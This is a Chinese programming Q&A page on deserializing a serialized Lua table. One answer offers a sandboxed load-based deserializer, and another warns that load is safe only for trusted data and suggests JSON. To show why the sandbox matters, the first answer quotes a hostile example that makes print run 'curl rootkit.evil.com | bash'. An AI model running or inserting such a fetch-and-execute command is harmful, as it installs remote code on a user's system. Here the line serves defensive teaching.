Lua中的反序列化
我已经在Lua中序列化了一个表。Lua有没有函数可以使其反序列化?
function dump(o)
if type(o) == 'table' then
local s = '{ '
for k,v in pairs(o) do
if type(k) ~= 'number' then k = '"'..k..'"' end
s = s .. '['..k..'] = ' .. dump(v) .. ','
end
return s .. '} '
else
return tostring(o)
end
end
local people = {
{
name = "Fred",
address = "16 Long Street",
phone = "123456"
},
{
name = "Wilma",
address = "16 Long Street",
phone = "123456"
},
{
name = "Barney",
address = "17 Long Street",
phone = "123457"
}
}
file = io.open("test.lua", "a")
file:write("People:", dump(people))
该程序的输出为:
People: { [1] = { ["phone"] = 123456,["name"] = Fred,["address"] = 16 Long Street,} ,[2] = { ["phone"] = 123456,["name"] = Wilma, ["address"] = 16 Long Street,} ,[3] = { ["phone"] = 123457,["name"] = Barney,["address"] = 17 Long Street,} ,}
请建议一种在Lua中反序列化它的方法。
如果稍微更改你的代码…
...
end
return s .. '} '
+++ elseif type(o) == 'string' then
+++ return ("%q"):format( o )
else
return tostring(o)
end
...
…你就生成了有效的 Lua 代码。
现在你可以使用以下代码以相对安全的方式反序列化数据:
local function condfail( cond, ... )
if not cond then return nil, (...) end
return ...
end
function deserialize( str, vars )
-- 创建虚拟环境
local env = vars and setmetatable( {}, {__index=vars} ) or {}
-- 创建返回反序列化数值的函数
local f, _err = load( "return "..str, "=deserialize", "t", env )
if not f then return nil, _err end -- 语法错误?
-- 设定安全运行环境
local co = coroutine.create( f )
local hook = function( ) debug.sethook( co, error, "c", 1000000 ) end
debug.sethook( co, hook, "c" )
-- 运行反序列化
return condfail( coroutine.resume( co ) )
end
非安全的反序列化方法是使用简单的 load( "return "..str )( ),但这会允许运行任意的 Lua 代码。
首先,我们将函数放在一个独立的环境中,这样它就不能影响全局环境。(例如,执行 print = function() os.execute "curl rootkit.evil.com | bash" end 就会将函数替换为稍后从不同(未受保护)上下文中调用的某个东西,从而运行任意代码)。为了方便起见,你可以传递一个表,以便数据可以引用预定义的变量。(你可能不会需要这个,但如果你曾经需要预定义的常量,那就是提供它们的方法。)
接下来,我们在一个独立的协程中运行函数,以便我们可以设置一个不影响程序其他部分的调试钩子。然后,我们可以禁止执行任何函数调用,通过 effectively setting debug.sethook( co, error, "c" )。(因为函数的初始调用会触发这个,所以我们推迟了一次调用来延迟这个钩子的效果。因此,我们设置一个钩子,在调用时将其更改为 error。)
现在,所有函数调用都被禁止了,外部环境也不能受到运行代码的影响。攻击者唯一能做的事情就是浪费时间——例如,通过像 while true do end 或 ::x:: goto x 这样的无限循环。因此,当设置钩子时,我们还设置了最大指令计数:debug.sethook( co, error, "c", 1000000 )。对于比较大的文件,一百万条指令应该足够了。这是一个任意的限制,如果太小则将其增加。(它足以计数循环到 250000,因此可以创建超过此数量的基本值。)
作者:
用户6149698
- Lua 虚拟机加密load(string.dump(function)) 后执行失败问题如何解决
- 我想创建一个 Nginx 规则,禁止访问
- 如何将两个不同的lua文件合成一个 东西有点长 大佬请耐心看完 我是小白研究几天了都没搞定
- 如何在roblox studio中1:1导入真实世界的地形?
- 求解,lua_resume的第二次调用继续执行协程问题。
- 【上海普陀区】内向猫网络招募【Skynet游戏框架Lua后端程序员】
- SF爱好求教:如何用lua实现游戏内调用数据库函数实现账号密码注册?
- Lua实现网站后台开发
- LUA错误显式返回,社区常见的规约是怎么样的
- lua5.3下载库失败
- 请问如何实现文本框内容和某个网页搜索框内容连接,并把网页输出来的结果反馈到另外一个文本框上
- lua lanes多线程使用
- 一个kv数据库
- openresty 有没有比较轻量的 docker 镜像
- 想问一下,有大佬用过luacurl吗
- 在Lua执行过程中使用Load函数出现问题
- 为什么 neovim 里没有显示一些特殊字符?
- Lua比较两个表的值(不考虑键的顺序)
- 有个lua简单的项目,外包,有意者加微信 liuheng600456详谈,最好在成都
- 如何在 Visual Studio 2022 中运行 Lua 代码?
将数据反序列化为执行代码的廉价方法是运行该数据。在序列化时,你要构建可执行的源代码。类似于你已经做过的事情,但要添加一些细节——在 table 构造函数之前添加 'return',并用引号包含字符串,如果字符串中包含引号符,则可能需要进行一些转义。
需要注意的是这只适用于受信任的数据。当数据来自外部来源时,它可能包含不仅预期的数据,还可能包含一些可能想要危害你的系统的代码。
否则,你可以尝试使用 JSON,目前已经有很多可用于 JSON 序列化/反序列化的库。